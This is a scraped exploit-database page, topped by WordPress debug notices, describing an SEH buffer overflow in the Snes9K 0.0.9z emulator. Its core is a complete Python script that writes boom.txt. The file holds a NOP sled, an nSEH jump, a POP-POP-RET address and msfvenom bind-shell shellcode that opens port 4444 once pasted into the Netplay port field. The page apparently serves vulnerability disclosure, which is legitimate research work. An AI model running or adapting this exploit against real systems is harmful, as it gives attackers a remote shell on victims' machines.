Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Snes9K 0.0.9z - Buffer Overflow (SEH) - exploit.company
header-logo
Suggest Exploit
vendor:
Snes9K
by:
Abdullah Aliç
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Snes9K
Affected Version From: 0.0.9z
Affected Version To: 0.0.9z
Patch Exists: NO
Related CWE:
CPE: a:snes9k_project:snes9k:0.0.9z
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional sp3(ENG)
2018

Snes9K 0.0.9z – Buffer Overflow (SEH)

This exploit takes advantage of a buffer overflow vulnerability in Snes9K version 0.0.9z. By pasting the contents of boom.txt into the Socket Port Number field under Netplay -> Options, an attacker can connect to the victim machine on port 4444. The exploit payload is a windows/shell_bind_tcp payload generated using msfvenom.

Mitigation:

Update to a patched version of Snes9K or use alternative emulation software.
Source

Exploit-DB raw data:

# Exploit Title: Snes9K 0.0.9z - Buffer Overflow (SEH)
# Date: 2018-10-13
# Exploit Author: Abdullah Alıç
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download
# Version: 0.0.9z
# Tested on: Windows XP Professional sp3(ENG) 
# Category: Windows Local Exploit
# How to use: open the program go to "Netplay --> Options" paste the contents of boom.txt 
# in  Socket Port Number --> Connect victim machine on port 4444   
#!/usr/bin/python

#msfvenom -p windows/shell_bind_tcp  -b "\x00\x0a\x0d\x9f\x8f\x8e\x8d\x9e\x9d\xd0\xdd\xfd\xfe\xf0\xde" -f python
#352 bytes
buf =  ""
buf += "\x2b\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\x43\x2b\x2a\x41\x83\xee\xfc\xe2\xf4\xbf\xc3"
buf += "\xa8\x41\x43\x2b\x4a\xc8\xa6\x1a\xea\x25\xc8\x7b\x1a"
buf += "\xca\x11\x27\xa1\x13\x57\xa0\x58\x69\x4c\x9c\x60\x67"
buf += "\x72\xd4\x86\x7d\x22\x57\x28\x6d\x63\xea\xe5\x4c\x42"
buf += "\xec\xc8\xb3\x11\x7c\xa1\x13\x53\xa0\x60\x7d\xc8\x67"
buf += "\x3b\x39\xa0\x63\x2b\x90\x12\xa0\x73\x61\x42\xf8\xa1"
buf += "\x08\x5b\xc8\x10\x08\xc8\x1f\xa1\x40\x95\x1a\xd5\xed"
buf += "\x82\xe4\x27\x40\x84\x13\xca\x34\xb5\x28\x57\xb9\x78"
buf += "\x56\x0e\x34\xa7\x73\xa1\x19\x67\x2a\xf9\x27\xc8\x27"
buf += "\x61\xca\x1b\x37\x2b\x92\xc8\x2f\xa1\x40\x93\xa2\x6e"
buf += "\x65\x67\x70\x71\x20\x1a\x71\x7b\xbe\xa3\x74\x75\x1b"
buf += "\xc8\x39\xc1\xcc\x1e\x43\x19\x73\x43\x2b\x42\x36\x30"
buf += "\x19\x75\x15\x2b\x67\x5d\x67\x44\xd4\xff\xf9\xd3\x2a"
buf += "\x2a\x41\x6a\xef\x7e\x11\x2b\x02\xaa\x2a\x43\xd4\xff"
buf += "\x2b\x4b\x72\x7a\xa3\xbe\x6b\x7a\x01\x13\x43\xc0\x4e"
buf += "\x9c\xcb\xd5\x94\xd4\x43\x28\x41\x52\x77\xa3\xa7\x29"
buf += "\x3b\x7c\x16\x2b\xe9\xf1\x76\x24\xd4\xff\x16\x2b\x9c"
buf += "\xc3\x79\xbc\xd4\xff\x16\x2b\x5f\xc6\x7a\xa2\xd4\xff"
buf += "\x16\xd4\x43\x5f\x2f\x0e\x4a\xd5\x94\x2b\x48\x47\x25"
buf += "\x43\xa2\xc9\x16\x14\x7c\x1b\xb7\x29\x39\x73\x17\xa1"
buf += "\xd6\x4c\x86\x07\x0f\x16\x40\x42\xa6\x6e\x65\x53\xed"
buf += "\x2a\x05\x17\x7b\x7c\x17\x15\x6d\x7c\x0f\x15\x7d\x79"
buf += "\x17\x2b\x52\xe6\x7e\xc5\xd4\xff\xc8\xa3\x65\x7c\x07"
buf += "\xbc\x1b\x42\x49\xc4\x36\x4a\xbe\x96\x90\xda\xf4\xe1"
buf += "\x7d\x42\xe7\xd6\x96\xb7\xbe\x96\x17\x2c\x3d\x49\xab"
buf += "\xd1\xa1\x36\x2e\x91\x06\x50\x59\x45\x2b\x43\x78\xd5"
buf += "\x94"

nseh= "\xeb\x06\x90\x90" 
seh = "\x39\x1f\xd1\x72" #POP-POP-RET msacm32.drv

buffer = "\x90" * 244 +  nseh + seh + buf + "\x90"*20

payload = buffer
try:
    f=open("boom.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

Navigation

Suggest Exploit

Services By CQR

cqrsecured